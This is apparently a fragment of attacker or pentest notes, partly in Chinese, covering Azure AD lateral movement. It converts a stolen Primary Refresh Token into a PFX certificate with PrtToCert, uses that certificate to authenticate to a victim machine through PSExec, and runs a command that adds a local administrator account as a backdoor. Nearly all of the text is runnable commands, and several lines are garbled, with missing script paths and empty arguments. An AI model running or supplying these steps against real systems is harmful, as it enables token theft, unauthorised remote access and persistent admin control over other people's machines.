Copy-Item -ToSession $jumpvm -Path C:\Tools\ -Destination C:\Users\Username\Documents\username –Verbose
Expand-Archive -Path C:\Users\Username\Documents\username\ -DestinationPath C:\Users\Username\Documents\username\PrtToCert

需要 PRT、TenantID、Context 和 DerivedKey
& 'C:\Program Files\Python39\python.exe' C:\Users\Username\Documents\username\PrtToCert\ --tenantId <TENANT-ID> --prt <PRT> --userName <Username>@<TENANT NAME> --hexCtx <HEX-CONTEXT> --hexDerivedKey <HEX-DERIVED-KEY>
PFX 使用名称 <Username>@<TENANT NAME> 和密码 AzureADCert 保存
Python tool that will authenticate to the remote machine, run PSEXEC and open a CMD on the victim machine [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP --usercert "admin.pfx" --certpass password --remoteip

python --usercert C:\Users\Username\Documents\username\<USERNAME>@<TENANT NAME> --
certpass AzureADCert --remoteip --command "cmd.exe /c net user username Password@123 /add /Y && net localgroup administrators username /add"